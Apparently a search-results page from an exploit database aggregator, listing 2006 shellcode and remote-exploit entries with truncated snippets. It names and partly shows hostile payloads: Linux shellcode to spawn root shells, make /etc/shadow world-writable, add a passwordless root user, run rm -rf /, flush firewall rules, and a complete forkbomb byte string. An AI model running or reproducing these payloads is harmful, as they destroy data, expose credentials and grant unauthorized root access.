Lucene search
K

7258 matches found

seebug.org
seebug.org
added 2006/11/17 12:0 a.m.28 views

linux/x86 setuid(0) + execve(/bin/sh) 28 bytes

No description provided by source. / revenge-setuid.c, v1.0 2006/09/30 14:57 linux/x86 setuid0 + execve"/bin//sh", "/bin//sh", NULL shellcode once again... setuid 6 bytes + execve 22 bytes = 28 bytes Same as revenge-execve.c we start the 2 system calls with a mov resulting in 2 bytes less, but th...

7.1AI score
Exploits0
0day.today
0day.today
added 2006/11/17 12:0 a.m.41 views

linux/x86 chmod 0666 /etc/shadow 36 bytes

Exploit for linux/x86 platform in category shellcode ========================================= linux/x86 chmod 0666 /etc/shadow 36 bytes ========================================= / By Kris Katterjohn 8/29/2006 36 byte shellcode to chmod"/etc/shadow", 0666 and exit for Linux/x86 To remove exit:...

7AI score
Exploits0
0day.today
0day.today
added 2006/11/17 12:0 a.m.25 views

linux/x86 add root user r00t with no password to /etc/passwd 69 bytes

Exploit for linux/x86 platform in category shellcode ===================================================================== linux/x86 add root user r00t with no password to /etc/passwd 69 bytes ===================================================================== / By Kris Katterjohn 11/14/2006 69...

7AI score
Exploits0
0day.today
0day.today
added 2006/11/17 12:0 a.m.14 views

linux/x86 /sbin/ipchains -F 40 bytes

Exploit for linux/x86 platform in category shellcode ==================================== linux/x86 /sbin/ipchains -F 40 bytes ==================================== / By Kris Katterjohn 11/18/2006 40 byte shellcode to flush ipchains for Linux x86 section .text global start start: ;...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2006/11/17 12:0 a.m.21 views

linux/x86 - set system time to 0 and exit 12 bytes

linux/x86 set system time to 0 and exit 12 bytes. Shellcode exploit for linx86 platform / By Kris Katterjohn 11/18/2006 12 byte shellcode to set system time to 0 and exit. No real damage : exit code is the last 5 bytes 0x6a - 0x80 for Linux/x86 section .text global start start: ; stime0 push byte...

7.3AI score
Exploits0
Exploit DB
Exploit DB
added 2006/11/17 12:0 a.m.28 views

linux/x86 - /sbin/ipchains -F 40 bytes

linux/x86 /sbin/ipchains -F 40 bytes. Shellcode exploit for linx86 platform / By Kris Katterjohn 11/18/2006 40 byte shellcode to flush ipchains for Linux x86 section .text global start start: ; execve"/sbin/ipchains", "/sbin/ipchains", "-F", NULL , NULL push byte 11 pop eax cdq push edx push word...

Exploits0
seebug.org
seebug.org
added 2006/11/17 12:0 a.m.11 views

linux/x86 execve(/bin/sh) 22 bytes

No description provided by source. / revenge-execve.c, v1.0 2006/10/14 16:32 Yet another linux execve shellcode.. linux/x86 execve"/bin//sh/","/bin//sh",NULL shellcode http://www.0xcafebabe.it [email protected] But this time it's 22 bytes We could start the shellcode with a mov instead of pus...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2006/11/17 12:0 a.m.13 views

linux/x86 /sbin/ipchains -F 40 bytes

No description provided by source. / By Kris Katterjohn 11/18/2006 40 byte shellcode to flush ipchains for Linux x86 section .text global start start: ; execve"/sbin/ipchains", "/sbin/ipchains", "-F", NULL , NULL push byte 11 pop eax cdq push edx push word 0x462d mov ecx, esp push edx push word...

7.1AI score
Exploits0
Exploit DB
Exploit DB
added 2006/11/17 12:0 a.m.26 views

linux/x86 - forkbomb 7 bytes

linux/x86 forkbomb 7 bytes. Shellcode exploit for linx86 platform / By Kris Katterjohn 8/29/2006 7 byte shellcode for a forkbomb section .text global start start: push byte 2 pop eax int 0x80 jmp short start / main char shellcode = "\x6a\x02\x58\xcd\x80\xeb\xf9"; void shellcode; // milw0rm.com...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2006/11/17 12:0 a.m.28 views

linux/x86 - execverm -rf / shellcode 45 bytes

linux/x86 execverm -rf / shellcode 45 bytes. Shellcode exploit for linx86 platform / By Kris Katterjohn 11/18/2006 45 byte shellcode to execve"rm -rf /" for Linux/x86 section .text global start start: ; execve"/bin/rm", "/bin/rm", "-r", "-f", "/", NULL , NULL push byte 11 pop eax cdq push edx pus...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2006/11/16 12:0 a.m.29 views

linux/x86 - setuid0 + execve/bin/sh 28 bytes

linux/x86 setuid0 + execve/bin/sh 28 bytes. Shellcode exploit for linx86 platform / revenge-setuid.c, v1.0 2006/09/30 14:57 linux/x86 setuid0 + execve"/bin//sh", "/bin//sh", NULL shellcode once again... setuid 6 bytes + execve 22 bytes = 28 bytes Same as revenge-execve.c we start the 2 system cal...

7.4AI score
Exploits0
0day.today
0day.today
added 2006/11/16 12:0 a.m.25 views

linux/x86 execve(/bin/sh) 22 bytes

Exploit for linux/x86 platform in category shellcode ================================== linux/x86 execve/bin/sh 22 bytes ================================== / revenge-execve.c, v1.0 2006/10/14 16:32 Yet another linux execve shellcode.. linux/x86 execve"/bin//sh/","/bin//sh",NULL shellcode...

7AI score
Exploits0
0day.today
0day.today
added 2006/11/16 12:0 a.m.17 views

linux/x86 setuid(0) + execve(/bin/sh) 28 bytes

Exploit for linux/x86 platform in category shellcode ============================================== linux/x86 setuid0 + execve/bin/sh 28 bytes ============================================== / revenge-setuid.c, v1.0 2006/09/30 14:57 linux/x86 setuid0 + execve"/bin//sh", "/bin//sh", NULL shellcode...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2006/11/16 12:0 a.m.25 views

linux/x86 - execve/bin/sh 22 bytes

linux/x86 execve/bin/sh 22 bytes. Shellcode exploit for linx86 platform / revenge-execve.c, v1.0 2006/10/14 16:32 Yet another linux execve shellcode.. linux/x86 execve"/bin//sh/","/bin//sh",NULL shellcode http://www.0xcafebabe.it But this time it's 22 bytes We could start the shellcode with a mov...

7.4AI score
Exploits0
0day.today
0day.today
added 2006/11/15 12:0 a.m.16 views

WinZIP <= 10.0.7245 (FileView ActiveX) Remote Buffer Overflow Expl

Exploit for unknown platform in category remote exploits ===================================================================== WinZIP = 10.0.7245 FileView ActiveX Remote Buffer Overflow Exploit ===================================================================== / WinZip = 10.0.7245 FileView...

7.1AI score
Exploits0
Exploit DB
Exploit DB
added 2006/11/15 12:0 a.m.32 views

WinZip 10.0.7245 - FileView ActiveX Remote Buffer Overflow

/ WinZip - prdelka / incl...

7.4AI score
Exploits0
seebug.org
seebug.org
added 2006/11/11 12:0 a.m.20 views

MS Internet Explorer 6/7 (XML Core Services) Remote Code Exec Exploit 3

No description provided by source. / ----------------------------------------------------------------------- MS Internet Explorer 6/7 XML Core Services Remote Code Execution Exploit Works on Windows XP versions including SP2 and 2K Author: M03 Credit: metasploit, jamikazu, yag kohnafor the...

7.1AI score
Exploits0
0day.today
0day.today
added 2006/11/10 12:0 a.m.15 views

MS Internet Explorer 6/7 (XML Core Services) Remote Code Exec Expl 3

Exploit for unknown platform in category remote exploits ======================================================================= MS Internet Explorer 6/7 XML Core Services Remote Code Exec Exploit 3 ======================================================================= /...

7.1AI score
Exploits0
Exploit DB
Exploit DB
added 2006/11/10 12:0 a.m.31 views

Microsoft Internet Explorer 6/7 - XML Core Services Remote Code Execution (3)

/ ----------------------------------------------------------------------- MS Internet Explorer 6/7 XML Core Services Remote Code Execution Exploit Works on Windows XP versions including SP2 and 2K Author: M03 Credit: metasploit, jamikazu, yag kohnafor the shellcode, LukeHack for the code, Greetz:...

7.4AI score
Exploits0
0day.today
0day.today
added 2006/11/02 12:0 a.m.18 views

linux/x86-64 execve(/bin/sh) 33 bytes

Exploit for linux/x86-64 platform in category shellcode ===================================== linux/x86-64 execve/bin/sh 33 bytes ===================================== Linux/X86-64 Dummy for shellcode: execve"/bin/sh", "/bin/sh", NULL hophet at gmail.com .text .globl start start: xorq %rdx, %rdx...

7AI score
Exploits0
Rows per page
Query Builder